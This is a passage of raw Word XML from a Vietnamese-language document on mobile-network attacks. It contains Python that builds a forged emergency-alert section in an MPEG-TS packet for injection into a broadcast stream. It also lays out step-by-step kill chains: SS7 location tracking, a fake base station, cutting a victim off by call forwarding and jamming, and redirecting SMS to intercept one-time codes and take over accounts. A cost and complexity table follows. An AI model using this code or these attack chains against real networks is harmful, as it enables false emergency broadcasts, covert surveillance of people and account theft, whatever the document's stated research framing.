          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        alert_level,        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># alert_level: 0=test, 1=emergency, 2=amber</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># reserved</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ]) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> text_encoded</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># MPEG-TS Private Section</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    section </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</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BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x72</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># table_id</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xB0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(descriptor)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&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># section_syntax_indicator=1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(descriptor)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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># table_id_extension</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xC1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># version_number=0, current_next=1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># section_number</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># last_section_number</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ]) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> descriptor</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Thêm CRC32</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> binascii</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    crc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> binascii.crc32(section) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xFFFFFFFF</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    section </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> struct.pack(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&gt;I"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, crc)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Đóng gói vào MPEG-TS packet (PID 0x0200 ví dụ)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ts_header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">([</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x47</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># sync, PID, payload_unit_start, cc</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> section.ljust(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">184</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\xFF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)[:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">184</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ts_header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Tạo EWS packet và chèn vào TS stream</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ews_packet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> create_ews_section(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"EMERGENCY ALERT: Test message"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, alert_level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="78"/>
    <w:bookmarkEnd w:id="79"/>
    <w:bookmarkStart w:id="82" w:name="kết-hợp-tấn-công-đa-vector"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Kết Hợp Tấn Công Đa Vector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trong thực tế nghiên cứu về khả năng tấn công, các kỹ thuật trên thường được kết hợp để đạt hiệu quả cao hơn:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="80" w:name="kill-chain-ss7-imsi-catcher"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.1 Kill Chain: SS7 + IMSI Catcher</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Giai đoạn 1 – Trinh sát (SS7):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  SRI → IMSI + MSC address</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  PSI → Cell-ID → Vị trí địa lý</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ATI → Lịch trình di chuyển (polling mỗi 5 phút)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Giai đoạn 2 – Tiếp cận vật lý (IMSI Catcher):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Khi mục tiêu đến khu vực đã biết:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Fake eNodeB thu hút UE → Xác nhận IMSI → Vị trí chính xác cm</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Giai đoạn 3 – Vô hiệu hóa liên lạc (SS7 + Jamming):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  SS7 RegisterSS CFU → Chuyển hướng cuộc gọi</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  SS7 CancelLocation → Đẩy UE offline</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Selective Jamming (dự phòng) → Cắt GSM/3G/4G/GPS</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="80"/>
    <w:bookmarkStart w:id="81" w:name="kill-chain-2fa-bypass"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.2 Kill Chain: 2FA Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Giai đoạn 1: Thu thập MSISDN mục tiêu</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Giai đoạn 2: SS7 SRI-SM → IMSI + SMSC address</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Giai đoạn 3: SS7 ForwardSM hoặc ISD SMSC redirect</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Giai đoạn 4: Yêu cầu reset mật khẩu → SMS OTP đến attacker</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Giai đoạn 5: Vượt 2FA → chiếm tài khoản</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="81"/>
    <w:bookmarkEnd w:id="82"/>
    <w:bookmarkStart w:id="85" w:name="so-sánh-và-phân-loại"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11. So Sánh và Phân Loại</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="83" w:name="ma-trận-so-sánh-kỹ-thuật"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.1 Ma Trận So Sánh Kỹ Thuật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Kỹ thuật</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lớp tấn công</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Yêu cầu gần mục tiêu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chi phí ước tính</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Độ phức tạp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hiệu quả chống 5G</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SS7 Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Signalling L7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Không (remote)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$500–$5,000/tháng (STP access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cao</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thấp (5G core tách biệt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Diameter Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Signalling L7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Không (remote)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tương tự SS7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cao</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Trung bình (4G core vẫn dùng)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IMSI Catcher (GSM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Radio L1–L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Có (100m–2km)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$300–$1,000 (SDR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Trung bình</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thấp (nếu UE 5G SA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IMSI Catcher (LTE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
